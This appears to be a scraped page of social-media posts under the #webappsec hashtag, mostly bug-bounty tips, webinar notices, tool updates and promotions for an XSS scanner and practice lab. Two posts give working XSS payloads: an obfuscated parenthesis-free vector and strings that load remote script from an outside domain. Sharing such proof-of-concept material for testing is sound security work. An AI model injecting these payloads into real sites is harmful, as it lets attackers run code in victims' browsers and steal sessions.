#webappsec search results
BypaXSS - The Brute Art of Bypass Slides from the @BugBountyArg @ekoparty 2025 talk #XSS #Bypass #WebAppSec docs.google.com/presentation/d…
When going for Blind #XSS attempts, it's better to use a polyglot since we don't know the context of the injection in advance. Just saying. 😎 #WebAppSec #BugBounty #PenTesting
🛠️ Webinar — Writing Your First Burp Extension 📅 28 Aug 2025 | 🕘 9–10 PM 🎤 Speaker: Marcus (a.k.a benkyou) 🔗 Join: linkedin.com/feed/update/ur… #CyberSecurity #BurpSuite #WebAppSec #CTF #Webinar
🚀 Day 2 of 30: 🛠 - Identify Target Subdomains! Start with tools like - Facebook certificate transparency - Google certificate transparency - Findomain - subjack etc. 🔍 These tools save you time by gathering data from multiple sources. #WebAppSec #bugbountytips #bugbounty…
Don't Underestimate HTTP Desync Attacks! HTTP Request Smuggling can lead to cache poisoning, XSS, and more. Make sure you know how to handle such vulnerabilities to keep your applications safe! #CyberSecurity #WebAppSec
Mind the Headers: HTTP Security Headers (X-Frame-Options, X-Content-Type-Options, etc.) are crucial for defending against various attacks. Ensure your web app is fortified! #WebAppSec
Today, I have a great resource reminder - which I have shared before - that I believe will be very useful for those who are improving themselves in the field of Web Application Security❗️🤓 Don't forget to add it to your bookmarks.🌸 Link: media.licdn.com/dms/document/m… #webappsec
According to my VM update this morning @zaproxy 2.16.0 is now available on @kalilinux #DAST #PenTest #WebAppSec #AppSec #RedTeam #PurpleTeam
Here's my research about Python dirty Arbitrary File Write to RCE via overwriting shared object files or overwriting bytecode files. Enjoy! siunam321.github.io/research/pytho… #Research #WebAppSec
You have to be really good manually in order to beat KNOXSS testing 1000's of URLs automatically for every possible #XSS scenario it can detect and prove. 😊 Those XSS scenarios. 👇 knoxss.pro/?page_id=766 #WebAppSec #BugBounty #PenTesting
⚡ Webinar — Next.js Middleware Bypass & How to Detect It 📅 29 Sept 2025 | 🕘 9–10 PM 🎤 Speaker: @takeptoto 🔗 meet.google.com/tza-umrb-you #CyberSecurity #Nextjs #WebAppSec #CTF #Webinar
Courtesy of @psiinon a performance fix for @zaproxy Auth Helper was released earlier today. #AppSec #WebAppSec #DevSecOps #DAST
XSS Without Parentheses location=tagName <JavaScript:"\74Svg\57OnLoad\75\141\154\145\162\164\501\51\76"/ContentEditable/AutoFocus/OnFocus=location=tagName> PoC: x55.is/brutelogic/gym… knoxss.pro - #XSS made easy. Try it now! #WebAppSec #PenTesting #BugBounty
I learned how web apps work behind the scenes (from HTML/CSS/JS to servers & databases) and how vulnerabilities like SQL Injection, XSS, & CSRF can expose critical systems. academy.hackthebox.com/achievement/21… #CyberSecurity #OWASP #WebAppSec #CloudSecurity #hackthebox #htbacademy
A real hunter: coffee for breakfast, a PoC for lunch, and a confirmed bounty email in the evening 💻☕️📬 #BugBounty #WebAppSec
SessionReaper in Magento hijacks live shopper sessions, stealing carts and credentials. Patch now and enforce secure session IDs. malwarebytes.com/blog/news/2025… #infosec #Magento #WebAppSec
If HttpOnly or Secure flags are missing, session theft becomes easier. #WebAppSec 🍪
Talking about #SSRF, I just got an idea to add SSRF-based #XSS to @KN0X55 ! It's coming in the update next week most probably. #WebAppSec #BugBounty #PenTesting
🔟 Server-Side Request Forgery (SSRF) ➡️ Attackers trick servers into making malicious requests. 🔑 Validate URLs, restrict network access, use allowlists. #SSRF #WebAppSec
Upload forms seem basic but are potential goldmines for attackers. The Upload Vulnerabilities room on @RealTryHackMe showed how easily malicious files bypass basic filters. A simple profile picture turning into remote code execution was mind-blowing. #UploadVulns #WebAppSec #RCE
🏆 KNOXSS September 2025 Giveaway 🏆 ➡️ Follow, like and share! 😍 ➡️ 1 Month Pro access for 3 winners on Friday 5th Good luck! 🤞 Check what only KNOXSS can find for you: knoxss.pro/?page_id=766 knoxss.pro - try it now! #WebAppSec #BugBounty #PenTesting
Improve your #XSS PoCs w/ a remote call to our X55.is domain! ➡️ Replacing alert(1) '-import('//X55.is')-' <Svg OnLoad=import('//X55.is')> ➡️ As href/src attribute <Base Href=//X55.is> <Script Src=//X55.is> ➡️ Jumping to # for custom JS x55.is/brutelogic/gym…
x55.is
XSS Gym - Train your XSS Muscles
More than 30 different XSS cases to play with, show and share XSS Proofs-of-Concept (PoCs).
This classic script vector they use to teach you about XSS doesn't work for DOM-based Reflected vulnerabilities! You can check that in our modern XSS lab. x55.is/brutelogic/gym… knoxss.pro Stay with the best or miss like the rest. #WebAppSec #BugBounty #PenTesting
There are several ways to test for #XSS that can be done manually but it is time expensive and very prone to be forgotten in a proper security assessment. Try knoxss.me #WebAppSec #PenTesting #BugBounty